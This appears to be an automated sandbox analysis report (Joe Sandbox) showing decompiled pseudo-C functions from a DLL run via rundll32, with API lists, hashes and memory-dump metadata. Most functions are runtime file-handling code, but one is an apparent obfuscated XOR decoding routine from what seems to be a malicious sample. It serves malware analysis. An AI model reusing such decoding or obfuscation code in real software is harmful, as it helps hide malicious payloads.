                                				_t68 = _t129 - _t112;
                                				_t137 = (_t68 >> 3) + 1;
                                				_t90 =  >  ? _t108 : _t68 + 7 >> 3;
                                				_t134 = _t133 | 0xffffffff;
                                				if (_t90 == 0) goto 0x130efa6d;
                                				_t70 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t112 + _t70)) != dil) goto 0x130efa4e;
                                				if (_t108 + 1 != _t90) goto 0x130efa48;
                                				_a24 = _t108 + 1 + _t70;
                                				r8d = 1;
                                				E00007FFC7FFC130ED6D0(_t137, _t108 + 1 + _t70, _t108 + 1);
                                				_t78 = _t70;
                                				if (_t70 == 0) goto 0x130efafd;
                                				_t104 = _t70 + _t137 * 8;
                                				_t138 = _t112;
                                				_v96 = _t104;
                                				_a32 = _t104;
                                				if (_t112 == _t129) goto 0x130efaf3;
                                				_v104 = _t78 - _t112;
                                				_t131 = _t134 + 1;
                                				if ( *((intOrPtr*)( *_t138 + _t131)) != dil) goto 0x130efaad;
                                				_t132 = _t131 + 1;
                                				if (E00007FFC7FFC130F3144(0, _t104, _t78, _t104, _t104 - _t104 + _a24, _t132) != 0) goto 0x130efb58;
                                				_t72 = _a32;
                                				 *((long long*)(_v104 + _t138)) = _t72;
                                				_a32 = _t72 + _t132;
                                				if (_t138 + 8 != _t129) goto 0x130efaa7;
                                				r14d = 0;
                                				 *_a16 = _t78;
                                				E00007FFC7FFC130EE114(_a16, _v104);
                                				_t83 =  >  ? _t108 : _t129 - _t112 + 7 >> 3;
                                				if (_t83 == 0) goto 0x130efb35;
                                				E00007FFC7FFC130EE114(_a16,  *_t112);
                                				if (_t108 + 1 != _t83) goto 0x130efb21;
                                				E00007FFC7FFC130EE114(_a16, _t112);
                                				return r14d;
                                			}


                                APIs
                                • _invalid_parameter_noinfo.LIBCMT ref: 00007FFC130EF994
                                  • Part of subcall function 00007FFC130EE5A0: IsProcessorFeaturePresent.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5A9
                                  • Part of subcall function 00007FFC130EE5A0: GetCurrentProcess.KERNEL32(00007FFC130F0B95), ref: 00007FFC130EE5CD
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                • String ID: *?$.
                                • API String ID: 4036615347-3972193922
                                • Opcode ID: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction ID: f95dd1a1179fcd6098ac39930be04504ea9cde9839ea17868ce99e4dd37e3983
                                • Opcode Fuzzy Hash: 4cda8f812522c02942c11826489b886558005b358df05b685b12336f39f260f7
                                • Instruction Fuzzy Hash: 30510162B15FA981EB10DFA298000B963E4FB44BECB454536DE1D27BC9EE3CD466C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                                				long long _v24;
                                				signed int _t21;
                                				signed int _t24;
                                				void* _t39;
                                				char _t42;
                                				void* _t47;
                                				void* _t63;
                                				signed int _t69;
                                				signed int _t74;
                                				intOrPtr* _t89;
                                				char* _t93;
                                				char* _t94;
                                				char* _t96;
                                				char* _t98;
                                				char* _t99;
                                				void* _t100;
                                				void* _t101;
                                				void* _t119;
                                
                                				_t89 = __rax;
                                				_a8 = __rbx;
                                				_t21 =  *0x13124dc8; // 0x0
                                				_v24 = __rcx;
                                				asm("movsd xmm0, [esp+0x20]");
                                				asm("movsd [edi], xmm0");
                                				__rcx[2] = 0;
                                				__rcx[1] = _t21;
                                				if ( *__rdx != 0x20) goto 0x130eea1a;
                                				_t93 = __rdx + 1;
                                				if ( *_t93 == 0x20) goto 0x130eea12;
                                				if ( *_t93 == 0x61) goto 0x130eea40;
                                				if ( *_t93 == 0x72) goto 0x130eea35;
                                				if ( *_t93 != 0x77) goto 0x130eec5d;
                                				 *__rcx = 0x301;
                                				goto 0x130eea46;
                                				 *__rcx =  *__rcx & 0;
                                				__rcx[1] = 1;
                                				goto 0x130eea4d;
                                				 *__rcx = 0x109;
                                				__rcx[1] = 2;
                                				_t94 = _t93 + 1;
                                				r9b = 0;
                                				r11b = 0;
                                				r10b = 0;
                                				r8b = 0;
                                				if ( *_t94 == 0) goto 0x130eeb8b;
                                				_t42 =  *_t94;
                                				_t63 = _t42 - 0x53;
                                				if (_t63 > 0) goto 0x130eeb0c;
                                				if (_t63 == 0) goto 0x130eeafc;
                                				if (_t63 == 0) goto 0x130eeb79;
                                				if (_t63 == 0) goto 0x130eead0;
                                				if (_t63 == 0) goto 0x130eeac8;
                                				if (_t63 == 0) goto 0x130eeab6;
                                				_t47 = _t42 - 0xfffffffffffffff2;
                                				if (_t63 == 0) goto 0x130eeaad;
                                				if (_t47 != 4) goto 0x130eec5d;
                                				if (r10b != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				goto 0x130eeb04;
                                				asm("bts dword [edi], 0x7");
                                				goto 0x130eeb77;
                                				if (( *__rcx & 0x00000040) != 0) goto 0x130eeb6d;
                                				goto 0x130eeb75;
                                				r8b = 1;
                                				goto 0x130eeb6d;
                                				if (r11b != 0) goto 0x130eeb6d;
                                				_t24 =  *__rcx;
                                				r11b = 1;
                                				if ((_t24 & 0x00000002) != 0) goto 0x130eeb6d;
                                				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
                                				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                				goto 0x130eeb77;
                                				_t69 = r10b;
                                				if (_t69 != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000020;
                                				r10b = 1;
                                				goto 0x130eeb79;
                                				if (_t69 == 0) goto 0x130eeb65;
                                				if (_t69 == 0) goto 0x130eeb56;
                                				if (_t69 == 0) goto 0x130eeb44;
                                				if (_t69 == 0) goto 0x130eeb38;
                                				if (_t47 - 0x3a != 6) goto 0x130eec5d;
                                				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xe");
                                				goto 0x130eeb75;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("btr dword [edi+0x4], 0xb");
                                				goto 0x130eeb4e;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("bts dword [edi+0x4], 0xb");
                                				r9b = 1;
                                				goto 0x130eeb79;
                                				_t74 =  *__rcx & 0x0000c000;
                                				if (_t74 != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xf");
                                				goto 0x130eeb75;
                                				asm("bt eax, 0xc");
                                				if (_t74 >= 0) goto 0x130eeb71;
                                				goto 0x130eeb79;
                                				asm("bts eax, 0xc");
                                				if (1 != 0) goto 0x130eea5e;
                                				if (r8b == 0) goto 0x130eeb93;
                                				_t96 = _t94 + __rax + 1;
                                				if ( *_t96 == 0x20) goto 0x130eeb90;
                                				if (r8b != 0) goto 0x130eebaf;
                                				if ( *_t96 != 0) goto 0x130eec5d;
                                				__rcx[2] = 1;
                                				goto 0x130eec6d;
                                				r8d = 3;
                                				if (E00007FFC7FFC130F1B40(_t47 - 0x3a, _t96, 0x1310ed38, _t119) != 0) goto 0x130eec5d;
                                				goto 0x130eebd5;
                                				_t98 = _t96 + 4;
                                				if ( *_t98 == 0x20) goto 0x130eebd2;
                                				if ( *_t98 != 0x3d) goto 0x130eec5d;
                                				_t99 = _t98 + 1;
                                				if ( *_t99 == 0x20) goto 0x130eebdf;
                                				r8d = 5;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t99) != 0) goto 0x130eec0a;
                                				_t100 = _t99 + 5;
                                				asm("bts dword [edi], 0x12");
                                				goto 0x130eec53;
                                				r8d = 8;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t100) != 0) goto 0x130eec2d;
                                				_t101 = _t100 + 8;
                                				asm("bts dword [edi], 0x11");
                                				goto 0x130eec53;
                                				r8d = 7;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t101) != 0) goto 0x130eec5d;
                                				asm("bts dword [edi], 0x10");
                                				goto 0x130eec53;
                                				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x130eec50;
                                				goto 0x130eeb9d;
                                				_t39 = E00007FFC7FFC130EE6A0(_t89);
                                				 *_t89 = 0x16;
                                				return E00007FFC7FFC130EE580(_t39);
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 3d3d684f05ca60b9351f6ae1519f0e4da1bcc7ff1a8d1dac3fd3f5df153a3e81
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 40%
                                			E00007FFC7FFC130E2380(signed int __rax, long long __rbx, void* __rcx, void* __rdx, signed int* __r8, void* __r9, long long __r12) {
                                				void* __rsi;
                                				signed int _t119;
                                				signed int _t160;
                                				void* _t163;
                                				signed int _t172;
                                				signed long long _t180;
                                				signed long long _t200;
                                				signed long long _t201;
                                				void* _t202;
                                				void* _t204;
                                				long long _t206;
                                				void* _t208;
                                				void* _t209;
                                				void* _t219;
                                				void* _t223;
                                				void* _t225;
                                				void* _t227;
                                
                                				_t172 = __rax;
                                				goto 0x13101440;
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				asm("int3");
                                				_t219 = _t208;
                                				 *((long long*)(_t219 + 0x18)) = __rbx;
                                				 *((long long*)(_t219 + 0x20)) = _t206;
                                				_push(_t204);
                                				_t209 = _t208 - 0x60;
                                				r13d = __r9 + 0x6ab;
                                				 *(_t209 + 0xb8) =  *((intOrPtr*)(_t209 + 0xc8)) + 0x152;
                                				 *((intOrPtr*)(_t209 + 0x98)) =  *(_t209 + 0xb8) + 0xfffffc37;
                                				r14d = __rcx + 0x37e1;
                                				r15d = __rdx + 0x1249;
                                				r14d =  <  ? __r9 - 0x2103 : r14d;
                                				if (r15d - _t206 + 0x3a59 > 0) goto 0x130e2709;
                                				 *((long long*)(_t219 + 8)) = __r12;
                                				_t163 = r14d - _t227 + 0x108;
                                				if (_t163 > 0) goto 0x130e25c8;
                                				 *((long long*)(_t219 - 0x60)) = 0x2032;
                                				r12d = 0x3189;
                                				 *(_t209 + 0x20) = 0x3595;
                                				r8d = r12d;
                                				r9d = 0x1f2c;
                                				E00007FFC7FFC130E9AC0(__r8, __rcx, __r8, _t206, _t227);
                                				r11d = _t202 + 0x19d;
                                				 *(_t209 + 0x50) = __r8;
                                				r10d = _t225 - 0x1033;
                                				__r8[0x22] = _t172;
                                				 *(_t209 + 0x48) = _t223 - 0x3b8;
                                				_t160 = __rcx - 0x114f;
                                				 *(_t209 + 0x40) = r10d;
                                				r8d = __rcx - 0x2ad;
                                				 *(_t209 + 0x38) = r11d;
                                				r9d = _t225 - 0x16de;
                                				 *(_t209 + 0x30) = _t206 + 0x36e7;
                                				 *((intOrPtr*)(_t209 + 0x28)) = __rdx + 0xfffffa9a;
                                				 *(_t209 + 0x20) = _t160;
                                				E00007FFC7FFC130FF160(_t172, __r8, __r8, _t225, _t223, _t202);
                                				r8d = 0;
                                				if (_t163 == 0) goto 0x130e2589;
                                				r9d = r8d;
                                				asm("o16 nop [eax+eax]");
                                				_t200 = __r8[0x90];
                                				 *(__r9 + __r8[0x22]) =  *(_t200 + __r8[2]) & 0x000000ff ^  *(__r8[0x14] + __r9);
                                				__r8[0x90] = ( *((intOrPtr*)(__r8[0x10] + 0x130)) - 0x23f6) % __r8[0xe];
                                				__r8[0x7c] = __r8[0x7c] + 0x1f2c;
                                				if (__r8[0x78] != __r8[0xc]) goto 0x130e2568;
                                				__r8[0x32] = __r8[0x32] + 0xffffdfce;
                                				r8d = r8d + 1;
                                				_t180 = r8d;
                                				if (_t180 - _t200 < 0) goto 0x130e24f0;
                                				__r8[0x66] = __r8[0x66] | 0x0a01b449;
                                				_t119 = __r8[0x4c] ^ 0x0000127e;
                                				if (_t119 - r12d >= 0) goto 0x130e25b8;
                                				r12d = r12d - _t119;
                                				__r8[0x66] = __r8[0x66] + _t180 * 0x44f9;
                                				__r8[0x56] = __r8[0x14];
                                				goto 0x130e2701;
                                				if (r14d - _t204 + 0x329d + r14d >= 0) goto 0x130e2624;
                                				_t201 = _t200 | __r8[0x2a];
                                				if (__r8[0x2e] - _t201 > 0) goto 0x130e2624;
                                				if ( *((intOrPtr*)( *__r8 + 0x1d0)) + 0x8acf - _t201 <= 0) goto 0x130e2610;
                                				__r8[0x32] = __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032);
                                				if (__r8[0x7e] - (_t160 | r13d) < 0) goto 0x130e26ed;
                                				r10d = _t160;
                                				r11d = __r8[0x78];
                                				r15d = r15d - (__r8[6] ^ r15d);
                                				r11d = r11d - __r8[0x74];
                                				r11d = r11d + __r8[0x24];
                                				r14d = r14d *  *__r8;
                                				r15d = r15d + 0xea7;
                                				r10d = r10d - __r8[0x12];
                                				r15d = r15d ^ 0x00002598;
                                				r8d = __r8[4];
                                				r9d = _t160;
                                				r8d = r8d &  *(_t209 + 0xb8);
                                				r12d = 0x3189;
                                				 *(_t209 + 0x58) = __r8[0x54] & 0x0000228c;
                                				r9d = r9d | r12d;
                                				 *(_t209 + 0x50) = _t160 & 0x00003666;
                                				 *(_t209 + 0x48) = r11d;
                                				 *(_t209 + 0x40) = __r8;
                                				 *(_t209 + 0x38) = r10d;
                                				 *(_t209 + 0x30) = r15d;
                                				 *((intOrPtr*)(_t209 + 0x28)) = _t223 - 0x343a;
                                				 *(_t209 + 0x20) = r14d;
                                				E00007FFC7FFC130E2060(__r8, _t160 | r13d, _t201, _t204, _t206, __r8[0x32] - ( *__r8 - 0x00001f2c ^ 0x00002032));
                                				__r8[0x62] = __r8[0x62] - __r8[0x4c] + _t160;
                                				return  *((intOrPtr*)(_t209 + 0xc0)) + 0xffffee61;
                                			}


                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocProcess
                                • String ID: 2 $6$62 $662 $7$8662
                                • API String ID: 1617791916-3329516171
                                • Opcode ID: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                                • Instruction ID: 799a62481cb79f975a68f88121b026e27988392592366ed8ebdcb442330c63ba
                                • Opcode Fuzzy Hash: d549252b29e21f15087af81f1e2d0605a3b1b60e3360cae5e9e19fc1c2354d83
                                • Instruction Fuzzy Hash: 5232F2735182C18BE371CF29E44479EBBA4F788748F148129EA899BB59DB7CE954CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
                                				void* __rbp;
                                				signed int _t120;
                                				long _t134;
                                				void* _t137;
                                				void* _t139;
                                				void* _t140;
                                				signed int _t155;
                                				signed int _t156;
                                				signed char _t160;
                                				signed char _t161;
                                				void* _t185;
                                				void* _t186;
                                				signed int* _t207;
                                				intOrPtr* _t210;
                                				long long _t221;
                                				intOrPtr* _t229;
                                				signed long long _t237;
                                				intOrPtr _t251;
                                				signed long long _t252;
                                				signed long long _t272;
                                				signed long long _t273;
                                				signed int* _t278;
                                				void* _t281;
                                				void* _t282;
                                				signed int* _t284;
                                				void* _t285;
                                				void* _t293;
                                				void* _t295;
                                				void* _t300;
                                				void* _t303;
                                
                                				_t280 = __rsi;
                                				_t155 = __ebx;
                                				_t207 = _t284;
                                				_t207[2] = __rbx;
                                				_t207[4] = __rdi;
                                				_t207[6] = __r8;
                                				_t282 = _t207 - 0x47;
                                				_t285 = _t284 - 0xc0;
                                				r12d = r9d;
                                				r9d =  *(_t282 + 0x77);
                                				_t278 = __rdx;
                                				r8d =  *(_t282 + 0x6f);
                                				_t229 = __rcx;
                                				E00007FFC7FFC130F20A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
                                				asm("movups xmm0, [eax]");
                                				asm("movups xmm1, xmm0");
                                				asm("psrldq xmm1, 0x8");
                                				asm("dec cx");
                                				 *(_t282 - 0x11) = _t303 >> 0x20;
                                				asm("movups [ebp-0x59], xmm0");
                                				asm("movsd xmm0, [eax+0x10]");
                                				asm("movsd [ebp-0x31], xmm0");
                                				asm("movsd [ebp-0x49], xmm0");
                                				if (r15d != 0xffffffff) goto 0x130f24c7;
                                				E00007FFC7FFC130EE680(_t207);
                                				 *_t207 =  *_t207 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t207);
                                				goto 0x130f280e;
                                				_t120 = E00007FFC7FFC130F3C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
                                				 *__rdx = _t120;
                                				if (_t120 != 0xffffffff) goto 0x130f24eb;
                                				E00007FFC7FFC130EE680(_t207);
                                				 *_t207 =  *_t207 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t207);
                                				 *_t207 = 0x18;
                                				goto 0x130f24bb;
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				r8d = r15d;
                                				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
                                				 *_t229 = 1;
                                				_t231 =  *(_t282 - 0x49) >> 0x20;
                                				_t156 = _t155 |  *(_t282 - 0x49);
                                				 *(_t285 + 0x28) = _t156;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				 *(_t282 - 0x29) = 0x18;
                                				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
                                				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				r14d =  *(_t282 - 0x55);
                                				 *(_t282 - 0x41) = _t207;
                                				if (_t207 != 0xffffffff) goto 0x130f25df;
                                				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f25ac;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				 *(_t282 - 0x55) = r14d;
                                				r8d = r15d;
                                				 *(_t285 + 0x28) = _t156;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				 *(_t282 - 0x41) = _t207;
                                				if (_t207 != 0xffffffff) goto 0x130f25df;
                                				_t237 =  *__rdx;
                                				_t210 =  *((intOrPtr*)(0x13124970 + (_t237 >> 6) * 8));
                                				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
                                				E00007FFC7FFC130EE630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
                                				goto 0x130f24bb;
                                				if (GetFileType(_t303) != 0) goto 0x130f263d;
                                				_t134 = GetLastError();
                                				E00007FFC7FFC130EE630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
                                				CloseHandle(_t300);
                                				if (_t134 != 0) goto 0x130f24bb;
                                				_t137 = E00007FFC7FFC130EE6A0(_t210);
                                				 *_t210 = 0xd;
                                				goto 0x130f24bb;
                                				if (_t137 != 2) goto 0x130f264a;
                                				goto 0x130f2652;
                                				if (_t137 != 3) goto 0x130f2652;
                                				_t160 =  *(_t282 - 0x59) | 0x48;
                                				E00007FFC7FFC130F3B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
                                				_t161 = _t160 | 0x00000001;
                                				 *(_t282 - 0x59) = _t161;
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
                                				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
                                				_t139 = E00007FFC7FFC130F22B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
                                				r13d = _t139;
                                				if (_t139 != 0) goto 0x130f26e3;
                                				asm("movups xmm0, [ebp-0x59]");
                                				asm("movsd xmm1, [ebp-0x31]");
                                				r8d = r12d;
                                				asm("movaps [ebp-0x1], xmm0");
                                				 *((char*)(_t282 - 0x61)) = 0;
                                				asm("movsd [ebp+0xf], xmm1");
                                				_t140 = E00007FFC7FFC130F1E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
                                				if (_t140 == 0) goto 0x130f26f2;
                                				r13d = _t140;
                                				E00007FFC7FFC130F5278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
                                				goto 0x130f280e;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x39)) =  *((intOrPtr*)(_t282 - 0x61));
                                				_t272 =  *_t278;
                                				_t273 = _t272 << 6;
                                				_t251 =  *((intOrPtr*)(0x13124970 + (_t272 >> 6) * 8));
                                				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) & 0x000000fe;
                                				 *(_t251 + _t273 + 0x3d) =  *(_t251 + _t273 + 0x3d) | r12d >> 0x00000010 & 0x00000001;
                                				if ((_t161 & 0x00000048) != 0) goto 0x130f2759;
                                				if ((r12b & 0x00000008) == 0) goto 0x130f2759;
                                				_t252 =  *_t278;
                                				_t221 =  *((intOrPtr*)(0x13124970 + (_t252 >> 6) * 8));
                                				 *(_t221 + (_t252 << 6) + 0x38) =  *(_t221 + (_t252 << 6) + 0x38) | 0x00000020;
                                				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f280c;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f280c;
                                				CloseHandle(_t281);
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				r8d =  *(_t282 - 0x11);
                                				 *(_t285 + 0x28) = 0xc0000000;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				 *(_t282 - 0x55) = r14d;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				if (_t221 != 0xffffffff) goto 0x130f27f2;
                                				E00007FFC7FFC130EE630(GetLastError(), _t221,  *(_t282 - 0x49) >> 0x20);
                                				 *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x38) & 0x000000fe;
                                				E00007FFC7FFC130F3DB0(_t161,  *_t278, _t185, _t231, _t278, _t280);
                                				goto 0x130f24bb;
                                				 *((long long*)( *((intOrPtr*)(0x13124970 + ( *_t278 >> 6) * 8)) + ( *_t278 << 6) + 0x28)) = _t221;
                                				return 0;
                                			}


                                APIs
                                Memory Dump Source
                                • Source File: 00000008.00000002.379986737.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000008.00000002.379976277.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380114635.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380150483.00007FFC13118000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380191785.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000008.00000002.380200985.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_7ffc130e0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                • String ID:
                                • API String ID: 1330151763-0
                                • Opcode ID: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction ID: 25588ca94b627607ef5f1f763dcafdefba288fa573b939a7fcf0709a7b59f7d7
                                • Opcode Fuzzy Hash: 544f02e6fad5c1fd8408f698f3878f30c1ec09c20e745f70c9dbf413a5d11e2f
                                • Instruction Fuzzy Hash: 31C1CD36B28E598AEB54CF64D9513AC37A5FB48BA8F014235CA2E677D5CF38E425C310
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F5864(void* __ebx, signed int __ecx, void* __edx, void* __ebp, signed int* __rax, long long __rbx, long long __rdx, long long __r8) {
                                				void* _t118;
                                				unsigned int _t135;
                                				void* _t139;
                                				void* _t142;
                                				char _t154;
                                				char _t155;
                                				char _t156;
                                				void* _t181;
                                				long long _t186;
                                				long long _t220;
                                				intOrPtr _t221;
                                				signed short* _t235;
                                				signed int* _t238;
                                				char* _t241;
                                				signed short* _t250;
                                				signed long long _t255;
                                				signed long long _t256;
                                				signed long long _t261;
                                				DWORD* _t263;
                                				signed short* _t264;
                                				void* _t270;
                                				void* _t272;
                                				signed long long _t274;
                                				void* _t276;
                                				void* _t277;
                                				long long _t279;
                                				signed short* _t281;
                                				signed short* _t288;
                                				long _t292;
                                				void* _t294;
                                				void* _t297;
                                				void* _t299;
                                				char* _t301;
                                				char* _t302;
                                				char* _t303;
                                
                                				_t279 = __r8;
                                				 *((long long*)(_t276 + 0x18)) = __rbx;
                                				 *((long long*)(_t276 + 0x10)) = __rdx;
                                				_t277 = _t276 - 0x60;
                                				r12d = r8d;
                                				if (r13d != 0xfffffffe) goto 0x130f58a5;
                                				E00007FFC7FFC130EE680(__rax);
                                				 *__rax = 0;
                                				E00007FFC7FFC130EE6A0(__rax);
                                				 *__rax = 9;
                                				goto 0x130f5cae;
                                				if (__ecx < 0) goto 0x130f5c97;
                                				_t181 = r13d -  *0x13124d70; // 0x40
                                				if (_t181 >= 0) goto 0x130f5c97;
                                				_t3 = _t270 + 1; // 0x1
                                				r8d = _t3;
                                				 *((long long*)(_t277 + 0x48)) = __r8;
                                				_t274 = __ecx << 6;
                                				_t255 = __ecx >> 6;
                                				 *(_t277 + 0x40) = _t255;
                                				_t220 =  *((intOrPtr*)(0x13124970 + _t255 * 8));
                                				if (( *(_t220 + _t274 + 0x38) & r8b) == 0) goto 0x130f5c97;
                                				if (r12d - 0x7fffffff <= 0) goto 0x130f5911;
                                				E00007FFC7FFC130EE680(_t220);
                                				 *_t220 = 0;
